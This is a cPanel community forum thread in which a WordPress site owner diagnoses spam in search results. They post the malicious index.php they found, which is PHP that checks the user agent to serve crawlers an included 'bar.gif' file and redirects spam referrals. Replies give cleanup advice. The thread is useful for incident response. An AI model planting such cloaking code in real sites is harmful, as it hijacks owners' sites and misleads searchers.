The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Incorrect results showing on Google and Bing search results?

Discussion in 'Security' started by Webuser2014, Jan 10, 2014.

  1. Webuser2014

    Webuser2014 Member

    Joined:
    Jan 10, 2014
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Website Owner
    Has anyone looked at their website search results lately? I have and it is advertising spam stuff. We have nothing to do with spam stuff. There is nothing in our files on the webserver that says spam stuff but somehow it is showing in the results. Any ideas?
     
    #1 Webuser2014, Jan 10, 2014
    Last edited by a moderator: Jan 10, 2014
  2. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    30,678
    Likes Received:
    654
    Trophy Points:
    113
    cPanel Access Level:
    Root Administrator
    Hello :)

    I suggest reviewing the .htaccess files and the code used in your scripts to determine if there is any data associated with those search engine results. It's possible your website files were exploited or the account itself was exploited.

    Thank you.
     
  3. Webuser2014

    Webuser2014 Member

    Joined:
    Jan 10, 2014
    Messages:
    9
    Likes Received:
    0
    Trophy Points:
    1
    cPanel Access Level:
    Website Owner
    Thank for the info.

    The index.php was modified somehow.

    It was modified to
    Code:
    <?php
    ini_set("display_errors","0");
    define('WP_USE_THEMES', true);
    
    $flag=false;$tmp=$_SERVER['HTTP_USER_AGENT'];if(stripos($tmp,'Google')!==false){$flag=true;}else if(stripos($tmp,'Bing')!==false){$flag=true;}else if(stripos($tmp,'Yahoo')!==false){$flag=true;}else if(stripos($tmp,'msnbot')!==false){$flag=true;}else if($_GET["c"]!=""){$flag=true;}
    if($flag == false){
    
    $RUrl=rawurldecode($_SERVER ['HTTP_REFERER']);
    
    if (stripos($RUrl, 'spam crap here') or stripos($_GET["p"],'spam') !== false){header ( "Location: http://www.spamsitenamehere.com/" );}else{require('./wp-blog-header.php');}
    } else {
    include_once('bar.gif');
    }
    
    I have restored it to the original so my wordpress site now works.

    Code:
    <?php
    /**
     * Front to the WordPress application. This file doesn't do anything, but loads
     * wp-blog-header.php which does and tells WordPress to load the theme.
     *
     * @package WordPress
     */
    
    /**
     * Tells WordPress to load the WordPress theme and output it.
     *
     * @var bool
     */
    define('WP_USE_THEMES', true);
    
    /** Loads the WordPress Environment and Template */
    require('./wp-blog-header.php');
     
  4. quizknows

    quizknows Well-Known Member

    Joined:
    Oct 20, 2009
    Messages:
    940
    Likes Received:
    55
    Trophy Points:
    28
    cPanel Access Level:
    DataCenter Provider
    Did you note the time stamps on the index file before you reverted it? You'll need this information to properly fix the infection, otherwise it will likely return.

    Check for any other files modified around that time; make sure your wordpress is updated, and audit your theme(s) and plugins for similar code. Always change your wp-admin password and your cPanel password as well.
     
Loading...

Share This Page